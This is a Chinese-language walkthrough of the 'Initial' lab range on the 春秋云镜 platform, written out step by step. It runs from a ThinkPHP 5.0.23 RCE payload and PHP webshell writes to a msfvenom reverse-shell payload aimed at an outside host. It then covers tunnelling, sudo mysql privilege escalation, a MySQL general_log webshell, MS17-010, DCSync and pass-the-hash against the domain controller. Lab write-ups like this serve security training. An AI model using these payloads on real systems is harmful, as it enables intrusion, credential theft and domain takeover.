春秋云镜-initial

Initial

只记录关键步骤

外网打点

http://47.92.100.172/

image

tp5.0.23 rce

1
2
3
POST
http://47.92.100.172/?s=captcha&test=-1
_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=ls

写马

1
_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=echo '<?php eval($_POST[1]);?>' > /var/www/html/1.php

这里考虑用msf来做后渗透

生成elf的payload

1
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=120.27.248.81 lport=44444 -f elf > reverse_msf_shell

开启监听

image

image

上线msf

image

获得机器所有网段信息

1
2
3
4
5
6
7
8
meterpreter > run post/multi/manage/autoroute 

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Running module against 172.22.1.15
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.22.0.0/255.255.0.0 from host's routing table.

配置静态路由

1
2
3
4
5
6
7
8
meterpreter > run post/multi/manage/autoroute SUBNET=172.22.0.0 ACTION=ADD

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Running module against 172.22.1.15
[*] Adding a route to 172.22.0.0/255.255.255.0...
[+] Route added to subnet 172.22.0.0/255.255.255.0.

image

直接sudo提权即可

1
sudo mysql -e '\! /bin/sh'

image

拿到第一个flag

1
2
3
4
5
6
7
8
9
10
11
12
 ██     ██ ██     ██       ███████   ███████       ██     ████     ██   ████████ 
░░██   ██ ░██    ████     ██░░░░░██ ░██░░░░██     ████   ░██░██   ░██  ██░░░░░░██
 ░░██ ██  ░██   ██░░██   ██     ░░██░██   ░██    ██░░██  ░██░░██  ░██ ██      ░░ 
  ░░███   ░██  ██  ░░██ ░██      ░██░███████    ██  ░░██ ░██ ░░██ ░██░██     
   ██░██  ░██ ██████████░██      ░██░██░░░██   ██████████░██  ░░██░██░██    █████
  ██ ░░██ ░██░██░░░░░░██░░██     ██ ░██  ░░██ ░██░░░░░░██░██   ░░████░░██  ░░░░██
 ██   ░░██░██░██     ░██ ░░███████  ░██   ░░██░██     ░██░██    ░░███ ░░████████ 
░░     ░░ ░░ ░░      ░░   ░░░░░░░   ░░     ░░ ░░      ░░ ░░      ░░░   ░░░░░░░░  

Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.

flag01: flag{60*****

搭建隧道

使用Neo-reGeorg搭建隧道

https://github.com/L-codes/Neo-reGeorg

1
python .\neoreg.py generate -k aeqaq

生成代理文件

1
python .\neoreg.py -k aeqaq -u http://39.98.240.85/tunnel.php -p 4444

然后配置Proxifier的规则

image

信息搜集

用Landon扫c段

1
2
3
SMB: 172.22.1.2	XIAORANG         	DC01           	(Win2016-Datacenter-14393_10.0.14393)
SMB: 172.22.1.21	XIAORANG         	XIAORANG-WIN7  	(Win7-Professional-7601-SP1_6.1.7601)
SMB: 172.22.1.18	XIAORANG         	XIAORANG-OA01  	(Win2012-R2-Datacenter-9600_6.3.9600)

扫到了另一台主机,也就是172.22.1.18这台主机

扫描一下开放的端口

1
2
3
4
5
6
172.22.1.18      139 Open -> Banner: Windows Netbios
172.22.1.18      135 Open -> Default is WMI 
172.22.1.18      3389 Open -> Default is RDP 
172.22.1.18      445 Open -> Default is SMB 
172.22.1.18      3306 Open -> Default is Mysql 
172.22.1.18      80 Open -> Banner: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9

第二台主机

172.22.1.18

扫了一波目录,发现有phpMyadmin

root/root直接进去,那就很普通的getshell一下

开启日志记录

1
set global general_log = "ON";

查看当前的日志存放的目录

1
2
show variables like 'general%';
C:\phpStudy\PHPTutorial\MySQL\data\XIAORANG-OA01.l...

通过general_log_file来获取webshell

1
set global general_log_file = "C:/phpStudy/PHPTutorial/www/1.php";

日志写马

1
SELECT '<?php eval($_POST["123"]);?>'

即可写入木马

1
2
3
4
5
6
7
8
9
10
11
12
13
 ___    ___ ___  ________  ________  ________  ________  ________   ________   
|\  \  /  /|\  \|\   __  \|\   __  \|\   __  \|\   __  \|\   ___  \|\   ____\  
\ \  \/  / | \  \ \  \|\  \ \  \|\  \ \  \|\  \ \  \|\  \ \  \\ \  \ \  \___|  
 \ \    / / \ \  \ \   __  \ \  \\\  \ \   _  _\ \   __  \ \  \\ \  \ \  \  ___  
  /     \/   \ \  \ \  \ \  \ \  \\\  \ \  \\  \\ \  \ \  \ \  \\ \  \ \  \|\  \ 
 /  /\   \    \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
/__/ /\ __\    \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
|__|/ \|__|                                                                


flag02: ******

Awesome! ! ! You found the second flag, now you can attack the domain controller.

第三台主机

SMB: 172.22.1.21 XIAORANG XIAORANG-WIN7 (Win7-Professional-7601-SP1_6.1.7601)

开放端口:

1
2
3
4
5
172.22.1.21      139 Open -> Banner: Windows Netbios
172.22.1.21      5357 Open -> Banner: Win7 Microsoft-HTTPAPI
172.22.1.21      135 Open -> Default is WMI 
172.22.1.21      445 Open -> Default is SMB 
172.22.1.21      3389 Open -> Default is RDP

看到win7试下ms17-010

image

win7不出网,用正向监听进行漏洞利用

这里永恒之蓝利用上出了点问题,打不进去,换了kali即可轻松解决

image

域内信息搜集,查找域控

image

域控

域控:172.22.1.2

通过凭证转储:DCSync 攻击

1
2
load kiwi
dcsync_ntlm Administrator

image

直接通过哈希传递就能拿下域控,这里用impacket里的smbexec.py进行哈希传递

1
2
3
4
5
──(root㉿kali)-[~/impacket/examples]
└─# python smbexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 XIAORANG/administrator@172.22.1.2
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
1
2
3
4
5
6
7
8
9
10
11
12
C:\Windows\system32>type C:\Users\Administrator\flag\flag03.txt
           ___   ___                                                         
 \\ / /       / /    // | |     //   ) ) //   ) )  // | |     /|    / / //   ) ) 
  \  /       / /    //__| |    //   / / //___/ /  //__| |    //|   / / //    
  / /       / /    / ___  |   //   / / / ___ (   / ___  |   // |  / / //  ____   
 / /\\     / /    //    | |  //   / / //   | |  //    | |  //  | / / //    / /   
/ /  \\ __/ /___ //     | | ((___/ / //    | | //     | | //   |/ / ((____/ /  


flag03: *****}

Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.

总结

整体不难,适合没有内网基础的人从0学习,就是有点小贵。